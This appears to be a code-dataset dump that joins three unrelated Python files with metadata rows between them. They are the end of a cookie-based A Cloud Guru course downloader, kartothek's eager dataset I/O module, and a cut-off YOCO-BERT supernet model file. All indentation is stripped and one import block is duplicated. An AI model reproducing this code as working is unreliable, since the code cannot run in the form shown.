help="Download to specific directory.", metavar='')
advance.add_argument(
'-q', '--quality',
dest='quality',
type=int,
help="Download specific video quality.", metavar='')
advance.add_argument(
'-i', '--info',
dest='info',
action='store_true',
help="List all lectures with available resolution.")
advance.add_argument(
'-a', '--all',
dest='download_all',
action='store_true',
help="Download all courses without any prompt (default: false).")
advance.add_argument(
'-n', '--new',
dest='download_only_new',
action='store_true',
help="Download only courses that have not already been downloaded (default: false).")
advance.add_argument(
'-e', '--extension',
dest='extension',
type=str,
help="Rename course lecture video/audio files extension to defined by user.")
options = parser.parse_args()
if not options.cookies:
prompt = fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "cookie filename : " + fg + sb
filename = getpass._getuser(prompt=prompt)
if os.path.isfile(filename):
f_in = open(filename)
cookies = '\n'.join([line for line in (lines.strip() for lines in f_in) if line])
f_in.close()
cloud_guru = CloudGuru(cookies=cookies)
if options.info:
cloud_guru.courses_downloaded(path=options.output, download_only_new=options.download_only_new)
if not options.info:
cloud_guru.course_download(path=options.output, quality=options.quality,
user_extension=options.extension,
download_all=options.download_all,
download_only_new=options.download_only_new)
else:
sys.stdout.write(
'\n' + fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "file containing request headers is required.\n")
sys.exit(0)
if options.cookies:
if os.path.isfile(options.cookies):
f_in = open(options.cookies)
cookies = '\n'.join([line for line in (lines.strip() for lines in f_in) if line])
f_in.close()
cloud_guru = CloudGuru(cookies=cookies)
if options.info:
cloud_guru.courses_downloaded(path=options.output, download_only_new=options.download_only_new)
if not options.info:
cloud_guru.course_download(path=options.output, quality=options.quality,
user_extension=options.extension,
download_all=options.download_all,
download_only_new=options.download_only_new)
else:
sys.stdout.write(
'\n' + fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "unable to find file '%s'.\n" % options.cookies)
sys.exit(0)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
sys.stdout.write('\n' + fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sd + "User Interrupted..\n")
sys.exit(0)
| 53.293689
| 159
| 0.478799
|
53b63a008b1f33e803cfd4b04978d5850667f189
| 27,087
|
py
|
Python
|
kartothek/io/eager.py
|
jorisvandenbossche/kartothek
|
18b11e7b060bb778668ffc4e2f468910120e6385
|
[
"MIT"
] | 2
|
2019-05-29T09:45:20.000Z
|
2019-06-24T19:06:46.000Z
|
kartothek/io/eager.py
|
jorisvandenbossche/kartothek
|
18b11e7b060bb778668ffc4e2f468910120e6385
|
[
"MIT"
] | 18
|
2019-11-15T15:33:53.000Z
|
2022-03-04T02:08:18.000Z
|
kartothek/io/eager.py
|
jorisvandenbossche/kartothek
|
18b11e7b060bb778668ffc4e2f468910120e6385
|
[
"MIT"
] | null | null | null |
import warnings
from functools import partial
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union, cast
import pandas as pd
from kartothek.core.common_metadata import (
empty_dataframe_from_schema,
make_meta,
store_schema_metadata,
)
from kartothek.core.dataset import DatasetMetadata, DatasetMetadataBuilder
from kartothek.core.docs import default_docs
from kartothek.core.factory import DatasetFactory, _ensure_factory
from kartothek.core.naming import (
DEFAULT_METADATA_STORAGE_FORMAT,
DEFAULT_METADATA_VERSION,
PARQUET_FILE_SUFFIX,
get_partition_file_prefix,
)
from kartothek.core.typing import StoreInput
from kartothek.core.utils import lazy_store
from kartothek.io.iter import store_dataframes_as_dataset__iter
from kartothek.io_components.delete import (
delete_common_metadata,
delete_indices,
delete_top_level_metadata,
)
from kartothek.io_components.gc import delete_files, dispatch_files_to_gc
from kartothek.io_components.index import update_indices_from_partitions
from kartothek.io_components.metapartition import (
SINGLE_TABLE,
MetaPartition,
parse_input_to_metapartition,
)
from kartothek.io_components.read import dispatch_metapartitions_from_factory
from kartothek.io_components.update import update_dataset_from_partitions
from kartothek.io_components.utils import (
_ensure_compatible_indices,
align_categories,
normalize_args,
sort_values_categorical,
validate_partition_keys,
)
from kartothek.io_components.write import raise_if_dataset_exists
from kartothek.serialization import DataFrameSerializer
@default_docs
@normalize_args
def delete_dataset(dataset_uuid=None, store=None, factory=None):
"""
Delete the entire dataset from the store.
Parameters
----------
"""
ds_factory = _ensure_factory(
dataset_uuid=dataset_uuid,
load_schema=False,
store=store,
factory=factory,
load_dataset_metadata=False,
)
# Remove possibly unreferenced files
garbage_collect_dataset(factory=ds_factory)
# Delete indices first since they do not affect dataset integrity
delete_indices(dataset_factory=ds_factory)
for metapartition in dispatch_metapartitions_from_factory(ds_factory):
metapartition = cast(MetaPartition, metapartition)
metapartition.delete_from_store(dataset_uuid=dataset_uuid, store=store)
# delete common metadata after partitions
delete_common_metadata(dataset_factory=ds_factory)
# Delete the top level metadata file
delete_top_level_metadata(dataset_factory=ds_factory)
@default_docs
def read_dataset_as_dataframes(
dataset_uuid: Optional[str] = None,
store=None,
tables: Optional[List[str]] = None,
columns: Dict[str, List[str]] = None,
concat_partitions_on_primary_index: bool = False,
predicate_pushdown_to_io: bool = True,
categoricals: Dict[str, List[str]] = None,
label_filter: Callable = None,
dates_as_object: bool = False,
predicates: Optional[List[List[Tuple[str, str, Any]]]] = None,
factory: Optional[DatasetFactory] = None,
dispatch_by: Optional[List[str]] = None,
) -> List[pd.DataFrame]:
"""
Read a dataset as a list of dataframes.
Every element of the list corresponds to a physical partition.
Parameters
----------
Returns
-------
List[pandas.DataFrame]
Returns a list of pandas.DataFrame. One element per partition
Examples
--------
Dataset in store contains two partitions with two files each
.. code ::
>>> import storefact
>>> from kartothek.io.eager import read_dataset_as_dataframes
>>> store = storefact.get_store_from_url('s3://bucket_with_dataset')
>>> dfs = read_dataset_as_dataframes('dataset_uuid', store, 'core')
"""
ds_factory = _ensure_factory(
dataset_uuid=dataset_uuid,
store=store,
factory=factory,
load_dataset_metadata=True,
)
mps = read_dataset_as_metapartitions(
tables=tables,
columns=columns,
concat_partitions_on_primary_index=concat_partitions_on_primary_index,
predicate_pushdown_to_io=predicate_pushdown_to_io,
categoricals=categoricals,
label_filter=label_filter,
dates_as_object=dates_as_object,
predicates=predicates,
factory=ds_factory,
dispatch_by=dispatch_by,
dispatch_metadata=False,
)
return [mp.data for mp in mps]
@default_docs
def read_dataset_as_metapartitions(
dataset_uuid=None,
store=None,
tables=None,
columns=None,
concat_partitions_on_primary_index=False,
predicate_pushdown_to_io=True,
categoricals=None,
label_filter=None,
dates_as_object=False,
predicates=None,
factory=None,
dispatch_by=None,
dispatch_metadata=True,
):
"""
Read a dataset as a list of :class:`kartothek.io_components.metapartition.MetaPartition`.
Every element of the list corresponds to a physical partition.
Parameters
----------
Returns
-------
List[kartothek.io_components.metapartition.MetaPartition]
Returns a tuple of the loaded dataframe and the dataset metadata
Examples
--------
Dataset in store contains two partitions with two files each
.. code ::
>>> import storefact
>>> from kartothek.io.eager import read_dataset_as_dataframe
>>> store = storefact.get_store_from_url('s3://bucket_with_dataset')
>>> list_mps = read_dataset_as_metapartitions('dataset_uuid', store, 'core')
"""
ds_factory = _ensure_factory(
dataset_uuid=dataset_uuid,
store=store,
factory=factory,
load_dataset_metadata=False,
)
if len(ds_factory.tables) > 1:
warnings.warn(
"Trying to read a dataset with multiple internal tables. This functionality will be removed in the next "
"major release. If you require a multi tabled data format, we recommend to switch to the kartothek Cube "
"functionality. "
"https://kartothek.readthedocs.io/en/stable/guide/cube/kartothek_cubes.html",
DeprecationWarning,
)
from .iter import read_dataset_as_metapartitions__iterator
ds_iter = read_dataset_as_metapartitions__iterator(
tables=tables,
columns=columns,
concat_partitions_on_primary_index=concat_partitions_on_primary_index,
predicate_pushdown_to_io=predicate_pushdown_to_io,
categoricals=categoricals,
label_filter=label_filter,
dates_as_object=dates_as_object,
predicates=predicates,
factory=ds_factory,
dispatch_by=dispatch_by,
dispatch_metadata=dispatch_metadata,
)
return list(ds_iter)
def _check_compatible_list(table, obj, argument_name=""):
if obj is None:
return obj
elif isinstance(obj, dict):
if table not in obj:
raise ValueError(
"Provided table {} is not compatible with input from argument {}.".format(
table, argument_name
)
)
return obj
elif isinstance(obj, list):
return {table: obj}
else:
raise TypeError(
"Unknown type encountered for argument {}. Expected `list`, got `{}` instead".format(
argument_name, type(obj)
)
)
@default_docs
def read_table(
dataset_uuid: Optional[str] = None,
store=None,
table: Optional[str] = SINGLE_TABLE,
columns: Dict[str, List[str]] = None,
concat_partitions_on_primary_index: bool = False,
predicate_pushdown_to_io: bool = True,
categoricals: Dict[str, List[str]] = None,
label_filter: Callable = None,
dates_as_object: bool = False,
predicates: Optional[List[List[Tuple[str, str, Any]]]] = None,
factory: Optional[DatasetFactory] = None,
) -> pd.DataFrame:
"""
A utility function to load a single table with multiple partitions as a single dataframe in one go.
Mostly useful for smaller tables or datasets where all partitions fit into memory.
The order of partitions is not guaranteed to be stable in the resulting dataframe.
Parameters
----------
Returns
-------
pandas.DataFrame
Returns a pandas.DataFrame holding the data of the requested columns
Examples
--------
Dataset in store contains two partitions with two files each
.. code ::
>>> import storefact
>>> from kartothek.io.eager import read_table
>>> store = storefact.get_store_from_url('s3://bucket_with_dataset')
>>> df = read_table(store, 'dataset_uuid', 'core')
"""
if concat_partitions_on_primary_index is not False:
warnings.warn(
"The keyword `concat_partitions_on_primary_index` is deprecated and will be removed in the next major release.",
DeprecationWarning,
)
if not isinstance(table, str):
raise TypeError("Argument `table` needs to be a string")
columns = _check_compatible_list(table, columns, "columns")
categoricals = _check_compatible_list(table, categoricals, "categoricals")
ds_factory = _ensure_factory(
dataset_uuid=dataset_uuid,
store=store,
factory=factory,
load_dataset_metadata=False,
)
partitions = read_dataset_as_dataframes(
tables=[table],
columns=columns,
concat_partitions_on_primary_index=concat_partitions_on_primary_index,
predicate_pushdown_to_io=predicate_pushdown_to_io,
categoricals=categoricals,
label_filter=label_filter,
dates_as_object=dates_as_object,
predicates=predicates,
factory=ds_factory,
)
empty_df = empty_dataframe_from_schema(
schema=ds_factory.table_meta[table],
columns=columns[table] if columns is not None else None,
)
if categoricals:
empty_df = empty_df.astype({col: "category" for col in categoricals[table]})
dfs = [partition_data[table] for partition_data in partitions] + [empty_df]
# require meta 4 otherwise, can't construct types/columns
if categoricals:
dfs = align_categories(dfs, categoricals[table])
df = pd.concat(dfs, ignore_index=True, sort=False)
# ensure column order
if len(empty_df.columns) > 0 and list(empty_df.columns) != list(df.columns):
df = df.reindex(empty_df.columns, copy=False, axis=1)
return df
@default_docs
@normalize_args
def commit_dataset(
store: Optional[StoreInput] = None,
dataset_uuid: Optional[str] = None,
new_partitions: Optional[Iterable[MetaPartition]] = None,
output_dataset_uuid: Optional[str] = None,
delete_scope: Optional[Iterable[Dict[str, Any]]] = None,
metadata: Dict = None,
df_serializer: DataFrameSerializer = None,
metadata_merger: Callable[[List[Dict]], Dict] = None,
default_metadata_version: int = DEFAULT_METADATA_VERSION,
partition_on: Optional[Iterable[str]] = None,
factory: Optional[DatasetFactory] = None,
secondary_indices: Optional[Iterable[str]] = None,
):
"""
Commit new state to an existing dataset. This can be used for three distinct operations
1. Add previously written partitions to this dataset
If for some reasons, the existing pipelines are not sufficient but you need more control, you can write the files outside of a kartothek pipeline and commit them whenever you choose to.
This should be used in combination with
:func:`~kartothek.io.eager.write_single_partition` and :func:`~kartothek.io.eager.create_empty_dataset_header`.
.. code::
import pandas as pd
from kartothek.io.eager import write_single_partition, commit_dataset
store = "hfs://my_store"
# The partition writing can be done concurrently and distributed if wanted.
# Only the information about what partitions have been written is required for the commit.
new_partitions = [
write_single_partition(
store=store,
dataset_uuid='dataset_uuid',
data=pd.DataFrame({'column': [1, 2]}),
)
]
new_dataset = commit_dataset(
store=store,
dataset_uuid='dataset_uuid',
new_partitions=new_partitions,
)
2. Simple delete of partitions
If you want to remove some partitions this is one of the simples ways of doing so. By simply providing a delete_scope, this removes the references to these files in an atomic commit.
.. code::
commit_dataset(
store=store,
dataset_uuid='dataset_uuid',
delete_scope=[
{
"partition_column": "part_value_to_be_removed"
}
],
)
3. Add additional metadata
To add new metadata to an existing dataset
.. code::
commit_dataset(
store=store,
dataset_uuid='dataset_uuid',
metadata={"new": "user_metadata"},
)
Note::
If you do not want the new metadata to be merged with the existing one, povide a custom ``metadata_merger``
Parameters
----------
new_partitions:
Input partition to be committed.
"""
if output_dataset_uuid is not None:
warnings.warn(
"The keyword `output_dataset_uuid` has no use and will be removed in the next major release ",
DeprecationWarning,
)
if df_serializer is not None:
warnings.warn(
"The keyword `df_serializer` is deprecated and will be removed in the next major release.",
DeprecationWarning,
)
if not new_partitions and not metadata and not delete_scope:
raise ValueError(
"Need to provide either new data, new metadata or a delete scope. None of it was provided."
)
store = lazy_store(store)
ds_factory, metadata_version, partition_on = validate_partition_keys(
dataset_uuid=dataset_uuid,
store=store,
ds_factory=factory,
default_metadata_version=default_metadata_version,
partition_on=partition_on,
)
mps = parse_input_to_metapartition(
new_partitions, metadata_version=metadata_version
)
if secondary_indices:
mps = mps.build_indices(columns=secondary_indices)
mps_list = [_maybe_infer_files_attribute(mp, dataset_uuid) for mp in mps]
dmd = update_dataset_from_partitions(
mps_list,
store_factory=store,
dataset_uuid=dataset_uuid,
ds_factory=ds_factory,
delete_scope=delete_scope,
metadata=metadata,
metadata_merger=metadata_merger,
)
return dmd
def _maybe_infer_files_attribute(metapartition, dataset_uuid):
new_mp = metapartition.as_sentinel()
for mp in metapartition:
if len(mp.files) == 0:
if mp.data is None or len(mp.data) == 0:
raise ValueError(
"Trying to commit partitions without `data` or `files` information."
"Either one is necessary to infer the dataset tables"
)
new_files = {}
for table in mp.data:
new_files[table] = (
get_partition_file_prefix(
dataset_uuid=dataset_uuid,
partition_label=mp.label,
table=table,
metadata_version=mp.metadata_version,
)
+ PARQUET_FILE_SUFFIX # noqa: W503 line break before binary operator
)
mp = mp.copy(files=new_files)
new_mp = new_mp.add_metapartition(mp)
return new_mp
@default_docs
@normalize_args
def store_dataframes_as_dataset(
store,
dataset_uuid,
dfs,
metadata=None,
partition_on=None,
df_serializer=None,
overwrite=False,
secondary_indices=None,
metadata_storage_format=DEFAULT_METADATA_STORAGE_FORMAT,
metadata_version=DEFAULT_METADATA_VERSION,
):
"""
Utility function to store a list of dataframes as a partitioned dataset with multiple tables (files).
Useful for very small datasets where all data fits into memory.
Parameters
----------
dfs: List[Union[pd.DataFrame, Dict[str, pd.DataFrame]]]
The dataframe(s) to be stored.
Returns
-------
The stored dataset
"""
if isinstance(dfs, (pd.DataFrame, dict)):
dfs = [dfs]
warnings.warn(
"Passing a single dataframe instead of an iterable is deprecated and may "
"be removed in the next major release.",
DeprecationWarning,
)
return store_dataframes_as_dataset__iter(
dfs,
store=store,
dataset_uuid=dataset_uuid,
metadata=metadata,
partition_on=partition_on,
df_serializer=df_serializer,
overwrite=overwrite,
secondary_indices=secondary_indices,
metadata_storage_format=metadata_storage_format,
metadata_version=metadata_version,
)
@default_docs
@normalize_args
def create_empty_dataset_header(
store,
dataset_uuid,
table_meta,
partition_on=None,
metadata=None,
overwrite=False,
metadata_storage_format=DEFAULT_METADATA_STORAGE_FORMAT,
metadata_version=DEFAULT_METADATA_VERSION,
):
"""
Create an dataset header without any partitions. This may be used in combination
with :func:`~kartothek.io.eager.write_single_partition` to create implicitly partitioned datasets.
.. note::
The created dataset will **always** have explicit_partition==False
.. warning::
This function should only be used in very rare occasions. Usually you're better off using
full end-to-end pipelines.
Parameters
----------
"""
store = lazy_store(store)()
if not overwrite:
raise_if_dataset_exists(dataset_uuid=dataset_uuid, store=store)
for table, schema in table_meta.items():
table_meta[table] = make_meta(schema, origin=table, partition_keys=partition_on)
store_schema_metadata(
schema=table_meta[table],
dataset_uuid=dataset_uuid,
store=store,
table=table,
)
dataset_builder = DatasetMetadataBuilder(
uuid=dataset_uuid,
metadata_version=metadata_version,
partition_keys=partition_on,
explicit_partitions=False,
table_meta=table_meta,
)
if metadata:
for key, value in metadata.items():
dataset_builder.add_metadata(key, value)
if metadata_storage_format.lower() == "json":
store.put(*dataset_builder.to_json())
elif metadata_storage_format.lower() == "msgpack":
store.put(*dataset_builder.to_msgpack())
else:
raise ValueError(
"Unknown metadata storage format encountered: {}".format(
metadata_storage_format
)
)
return dataset_builder.to_dataset()
@default_docs
@normalize_args
def write_single_partition(
store=None,
dataset_uuid=None,
data=None,
metadata=None,
df_serializer=None,
overwrite=False,
metadata_merger=None,
metadata_version=DEFAULT_METADATA_VERSION,
partition_on=None,
factory=None,
secondary_indices=None,
):
"""
Write the parquet file(s) for a single partition. This will **not** update the dataset header and can therefore
be used for highly concurrent dataset writes.
For datasets with explicit partitions, the dataset header can be updated by calling
:func:`kartothek.io.eager.commit_dataset` with the output of this function.
.. note::
It is highly recommended to use the full pipelines whenever possible. This functionality should be
used with caution and should only be necessary in cases where traditional pipeline scheduling is not an
option.
.. note::
This function requires an existing dataset metadata file and the schemas for the tables to be present.
Either you have ensured that the dataset always exists though some other means or use
:func:`create_empty_dataset_header` at the start of your computation to ensure the basic dataset
metadata is there.
Parameters
----------
data: Dict
The input is defined according to :func:`~kartothek.io_components.metapartition.parse_input_to_metapartition`
Returns
-------
An empty :class:`~kartothek.io_components.metapartition.MetaPartition` referencing the new files
"""
if metadata is not None:
warnings.warn(
"The keyword `metadata` has no use and will be removed in the next major release ",
DeprecationWarning,
)
if overwrite is not False:
warnings.warn(
"The keyword `overwrite` has no use and will be removed in the next major release ",
DeprecationWarning,
)
if metadata_merger is not None:
warnings.warn(
"The keyword `metadata_merger` has no use and will be removed in the next major release ",
DeprecationWarning,
)
if data is None:
raise TypeError("The parameter `data` is not optional")
_, ds_metadata_version, partition_on = validate_partition_keys(
dataset_uuid=dataset_uuid,
store=lazy_store(store),
ds_factory=factory,
default_metadata_version=metadata_version,
partition_on=partition_on,
)
mp = parse_input_to_metapartition(obj=data, metadata_version=ds_metadata_version)
if partition_on:
mp = mp.partition_on(partition_on)
if secondary_indices:
mp = mp.build_indices(columns=secondary_indices)
mp = mp.validate_schema_compatible(dataset_uuid=dataset_uuid, store=store)
mp = mp.store_dataframes(
store=store, dataset_uuid=dataset_uuid, df_serializer=df_serializer
)
return mp
@default_docs
@normalize_args
def update_dataset_from_dataframes(
df_list: List[Union[pd.DataFrame, Dict[str, pd.DataFrame]]],
store=None,
dataset_uuid: Optional[str] = None,
delete_scope=None,
metadata=None,
df_serializer=None,
metadata_merger: Callable = None,
central_partition_metadata: bool = True,
default_metadata_version=DEFAULT_METADATA_VERSION,
partition_on: Optional[List[str]] = None,
load_dynamic_metadata: bool = True,
sort_partitions_by: Optional[str] = None,
secondary_indices: Optional[List[str]] = None,
factory: Optional[DatasetFactory] = None,
) -> DatasetMetadata:
"""
Update a kartothek dataset in store at once, using a list of dataframes.
Useful for datasets which do not fit into memory.
Parameters
----------
df_list: List[Union[pd.DataFrame, Dict[str, pd.DataFrame]]]
The dataframe(s) to be stored.
Returns
-------
The dataset metadata object (:class:`~kartothek.core.dataset.DatasetMetadata`).
"""
if load_dynamic_metadata is not True:
warnings.warn(
"The keyword `load_dynamic_metadata` has no use and will be removed in the next major release ",
DeprecationWarning,
)
if central_partition_metadata is not True:
warnings.warn(
"The keyword `central_partition_metadata` has no use and will be removed in the next major release ",
DeprecationWarning,
)
ds_factory, metadata_version, partition_on = validate_partition_keys(
dataset_uuid=dataset_uuid,
store=store,
ds_factory=factory,
default_metadata_version=default_metadata_version,
partition_on=partition_on,
)
secondary_indices = _ensure_compatible_indices(ds_factory, secondary_indices)
mp = parse_input_to_metapartition(
df_list,
metadata_version=metadata_version,
expected_secondary_indices=secondary_indices,
)
if sort_partitions_by:
mp = mp.apply(partial(sort_values_categorical, columns=sort_partitions_by))
if partition_on:
mp = mp.partition_on(partition_on)
if secondary_indices:
mp = mp.build_indices(secondary_indices)
mp = mp.store_dataframes(
store=store, dataset_uuid=dataset_uuid, df_serializer=df_serializer
)
return update_dataset_from_partitions(
mp,
store_factory=store,
dataset_uuid=dataset_uuid,
ds_factory=ds_factory,
delete_scope=delete_scope,
metadata=metadata,
metadata_merger=metadata_merger,
)
@default_docs
@normalize_args
def build_dataset_indices(store, dataset_uuid, columns, factory=None):
"""
Function which builds a :class:`~kartothek.core.index.ExplicitSecondaryIndex`.
This function loads the dataset, computes the requested indices and writes
the indices to the dataset. The dataset partitions itself are not mutated.
Parameters
----------
"""
ds_factory = _ensure_factory(
dataset_uuid=dataset_uuid,
store=store,
factory=factory,
load_dataset_metadata=False,
)
cols_to_load = {
table: set(columns) & set(meta.names)
for table, meta in ds_factory.table_meta.items()
}
cols_to_load = {table: cols for table, cols in cols_to_load.items() if cols}
new_partitions = []
for mp in dispatch_metapartitions_from_factory(ds_factory):
mp = mp.load_dataframes(
store=ds_factory.store,
tables=list(cols_to_load.keys()),
columns=cols_to_load,
)
mp = mp.build_indices(columns=columns)
mp = mp.remove_dataframes() # Remove dataframe from memory
new_partitions.append(mp)
return update_indices_from_partitions(
new_partitions, dataset_metadata_factory=ds_factory
)
@default_docs
@normalize_args
def garbage_collect_dataset(dataset_uuid=None, store=None, factory=None):
"""
Remove auxiliary files that are no longer tracked by the dataset.
These files include indices that are no longer referenced by the metadata
as well as files in the directories of the tables that are no longer
referenced. The latter is only applied to static datasets.
Parameters
----------
"""
ds_factory = _ensure_factory(
dataset_uuid=dataset_uuid,
store=store,
factory=factory,
load_dataset_metadata=False,
)
nested_files = dispatch_files_to_gc(
dataset_uuid=None, store_factory=None, chunk_size=None, factory=ds_factory
)
# Given that `nested_files` is a generator with a single element, just
# return the output of `delete_files` on that element.
return delete_files(next(nested_files), store_factory=ds_factory.store_factory)
| 31.754982
| 193
| 0.675195
|
6a275e1ab187a61d2eff4c4d582262ecd8e91629
| 26,437
|
py
|
Python
|
model/supermodel.py
|
MAC-AutoML/YOCO-BERT
|
94e513999524b5d5a9fb19ec93d2c05ce08ee5b7
|
[
"MIT"
] | 41
|
2021-06-05T02:50:07.000Z
|
2022-03-17T06:19:05.000Z
|
model/supermodel.py
|
MAC-AutoML/YOCO-BERT
|
94e513999524b5d5a9fb19ec93d2c05ce08ee5b7
|
[
"MIT"
] | 3
|
2021-07-01T05:36:09.000Z
|
2021-07-19T04:39:29.000Z
|
model/supermodel.py
|
MAC-AutoML/YOCO-BERT
|
94e513999524b5d5a9fb19ec93d2c05ce08ee5b7
|
[
"MIT"
] | 5
|
2021-06-07T02:58:40.000Z
|
2021-09-04T07:14:44.000Z
|
# -*- coding: utf-8 -*-
import sys
sys.path.append('./')
import math
import os
import warnings
from dataclasses import dataclass
from typing import Optional, Tuple
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import CrossEntropyLoss, MSELoss
import transformers
from transformers.activations import ACT2FN
from transformers.configuration_bert import BertConfig
from transformers.file_utils import ModelOutput
from transformers.modeling_bert import load_tf_weights_in_bert
from transformers.modeling_utils import (
PreTrainedModel,
apply_chunking_to_forward,
find_pruneable_heads_and_indices,
prune_linear_layer,
)
import math
import os
import warnings
from dataclasses import dataclass
from typing import Optional, Tuple
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import CrossEntropyLoss, MSELoss
import transformers
from transformers.activations import ACT2FN
from transformers.configuration_bert import BertConfig
from transformers.file_utils import ModelOutput
from transformers.modeling_bert import load_tf_weights_in_bert
from transformers.modeling_utils import (
PreTrainedModel,
apply_chunking_to_forward,
find_pruneable_heads_and_indices,
prune_linear_layer,
)
from modules.embeddingsuper import SuperEmbedding
from modules.layernormsuper import SuperLayerNorm
from modules.linearsuper import SuperLinear
class BertEmbeddings(nn.Module):
def __init__(self, config):
super().__init__()
self.word_embeddings = SuperEmbedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
self.position_embeddings = SuperEmbedding(config.max_position_embeddings, config.hidden_size)
self.token_type_embeddings = SuperEmbedding(config.type_vocab_size, config.hidden_size)
self.LayerNorm = SuperLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
self.sample_hidden_size = None
def forward(self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None):
if input_ids is not None:
input_shape = input_ids.size()
else:
input_shape = inputs_embeds.size()[:-1]
seq_length = input_shape[1]
if position_ids is None:
position_ids = self.position_ids[:, :seq_length]
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)
if inputs_embeds is None:
inputs_embeds = self.word_embeddings(input_ids)
position_embeddings = self.position_embeddings(position_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = inputs_embeds + position_embeddings + token_type_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
def set_sample_config(self, bert_hidden_size):
self.sample_hidden_size = bert_hidden_size
self.word_embeddings.set_sample_config(bert_hidden_size)
self.position_embeddings.set_sample_config(bert_hidden_size)
self.token_type_embeddings.set_sample_config(bert_hidden_size)
self.LayerNorm.set_sample_config(bert_hidden_size)
class BertSelfAttention(nn.Module):
def __init__(self, config):
super().__init__()
if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
raise ValueError(
"The hidden size (%d) is not a multiple of the number of attention "
"heads (%d)" % (config.hidden_size, config.num_attention_heads)
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = SuperLinear(config.hidden_size, self.all_head_size)
self.key = SuperLinear(config.hidden_size, self.all_head_size)
self.value = SuperLinear(config.hidden_size, self.all_head_size)
self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
self.sample_hidden_size = None
self.sample_num_attention_heads = None
self.sample_attention_head_size = None
self.sample_all_head_size = None
self.super_hidden_size = config.hidden_size
def transpose_for_scores(self, x):
new_x_shape = x.size()[:-1] + (self.sample_num_attention_heads, self.sample_attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
):
mixed_query_layer = self.query(hidden_states)
if encoder_hidden_states is not None:
mixed_key_layer = self.key(encoder_hidden_states)
mixed_value_layer = self.value(encoder_hidden_states)
attention_mask = encoder_attention_mask
else:
mixed_key_layer = self.key(hidden_states)
mixed_value_layer = self.value(hidden_states)
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
if attention_mask is not None:
attention_scores = attention_scores + attention_mask
attention_probs = nn.Softmax(dim=-1)(attention_scores)
attention_probs = self.dropout(attention_probs)
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.sample_all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
return outputs
def set_sample_config(self, bert_hidden_size, bert_head_num):
self.sample_hidden_size = bert_hidden_size
self.sample_num_attention_heads = bert_head_num
self.sample_attention_head_size = self.attention_head_size
self.sample_all_head_size = self.sample_num_attention_heads * self.sample_attention_head_size
self.query.set_sample_config(sample_in_dim = self.sample_hidden_size, sample_out_dim = self.sample_all_head_size)
self.key.set_sample_config(sample_in_dim = self.sample_hidden_size, sample_out_dim = self.sample_all_head_size)
self.value.set_sample_config(sample_in_dim = self.sample_hidden_size, sample_out_dim = self.sample_all_head_size)
class BertSelfOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = SuperLinear(config.hidden_size, config.hidden_size)
self.LayerNorm = SuperLayerNorm(config.hidden_size, eps = config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.sample_hidden_size = None
self.sample_head_num = None
self.origin_num_attention_heads = config.num_attention_heads
self.origin_attention_head_size = int(config.hidden_size / config.num_attention_heads)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
def set_sample_config(self, bert_hidden_size, bert_head_num):
self.sample_hidden_size = bert_hidden_size
self.sample_head_num = bert_head_num
self.sample_all_head_size = self.origin_attention_head_size * self.sample_head_num
self.dense.set_sample_config(self.sample_all_head_size, self.sample_hidden_size)
self.LayerNorm.set_sample_config(self.sample_hidden_size)
class BertAttention(nn.Module):
def __init__(self, config):
super().__init__()
self.self = BertSelfAttention(config)
self.output = BertSelfOutput(config)
self.pruned_heads = set()
self.sample_hidden_size = None
self.sample_num_attention_heads = None
def prune_heads(self, heads):
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(
heads, self.self.num_attention_heads, self.self.attention_head_size, self.pruned_heads
)
self.self.query = prune_linear_layer(self.self.query, index)
self.self.key = prune_linear_layer(self.self.key, index)
self.self.value = prune_linear_layer(self.self.value, index)
self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
self.self.num_attention_heads = self.self.num_attention_heads - len(heads)
self.self.all_head_size = self.self.attention_head_size * self.self.num_attention_heads
self.pruned_heads = self.pruned_heads.union(heads)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
):
self_outputs = self.self(
hidden_states,
attention_mask,
head_mask,
encoder_hidden_states,
encoder_attention_mask,
output_attentions,
)
attention_output = self.output(self_outputs[0], hidden_states)
outputs = (attention_output,) + self_outputs[1:]
